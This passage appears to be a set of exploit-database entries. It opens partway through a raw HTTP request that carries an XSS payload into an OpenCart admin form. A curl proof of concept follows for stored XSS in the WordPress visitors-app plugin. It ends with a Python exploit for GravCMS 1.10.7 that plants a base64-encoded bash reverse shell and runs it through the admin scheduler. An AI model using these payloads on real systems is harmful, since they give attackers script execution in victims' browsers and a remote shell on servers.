NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 187 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/opencart/admin/index.php?route=marketing/contact&user_token=xdMb2w0inuUPADXGigfCtsIMM0RgQ83t Cookie: language=en-gb; currency=EUR; OCSESSID=b21a152616460d44029878c9a0 store_id=0&to=customer_all&customer_group_id=1&customers=&affiliates=&products=&subject=%3Cscript%3Ealert(1)%3C%2Fscript%3E&message=&=&=&=http%3A%2F%2F&=on&files=&=&=&=&=&file=&=&=&=_self

# Exploit Title: WordPress Plugin visitors-app 0.3 - 'user-agent' Stored Cross-Site Scripting (XSS) # Date: 09/06/2021 # Exploit Author: Mesut Cetin # Vendor Homepage: https://profiles.wordpress.org/domingoruiz/ # Software Link: https://wordpress.org/plugins/visitors-app/ # Version: 0.3 # Tested on: Debian GNU/Linux 10 # Reference: https://wpscan.com/vulnerability/06f1889d-8e2f-481a-b91b-3a8008e00ffc ## Description: # A vulnerability in the Wordpress plugin "visitors" version 0.3 and prior allows remote attacker through # Cross-Site Scripting (XSS) to redirect administrators and visitors and potentially obtain sensitive informations # The 'user-agent' parameter allows attacker to escalate their privileges. ## PoC # Replace google.com with malicious attacker page curl -i http://localhost/wordpress --user-agent "</script><script>location=([]+/http:\\google.com/g).substr(1,19); </script>" # on http://localhost/wordpress/wp-admin, browse the tab "visitors"

# Exploit Title: GravCMS 1.10.7 - Arbitrary YAML Write/Update (Unauthenticated) (2) # Original Exploit Author: Mehmet Ince # Vendor Homepage: https://getgrav.org # Version: 1.10.7 # Tested on: Debian 10 # Author: legend #/usr/bin/python3 import requests import sys import re import base64 target= "http://192.168.1.2" #Change base64 encoded value with with below command. #echo -ne "bash -i >& /dev/tcp/192.168.1.3/4444 0>&1" | base64 -w0 payload=b"""/*<?php /**/ file_put_contents('/tmp/rev.sh',base64_decode('YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMy80NDQ0IDA+JjE='));chmod('/tmp/rev.sh',0755);system('bash /tmp/rev.sh'); """ s = requests.Session() r = s.get(target+"/admin") adminNonce = re.search(r'admin-nonce" value="(.*)"',r.text).group(1) if adminNonce != "" : url = target + "/admin/tools/scheduler" data = "admin-nonce="+adminNonce data +='&task=SaveDefault&data%5bcustom_jobs%5d%5bncefs%5d%5bcommand%5d=/usr/bin/php&data%5bcustom_jobs%5d%5bncefs%5d%5bargs%5d=-r%20eval%28base64_decode%28%22'+base64.b64encode(payload).decode('utf-8')+'%22%29%29%3b&data%5bcustom_jobs%5d%5bncefs%5d%5bat%5d=%2a%20%2a%20%2a%20%2a%20%2a&data%5bcustom_jobs%5d%5bncefs%5d%5boutput%5d=&data%5bstatus%5d%5bncefs%5d=enabled&data%5bcustom_jobs%5d%5bncefs%5d%5boutput_mode%5d=append' headers = {'Content-Type': 'application/x-www-form-urlencoded'} r = s.post(target+"/admin/config/scheduler",data=data,headers=headers)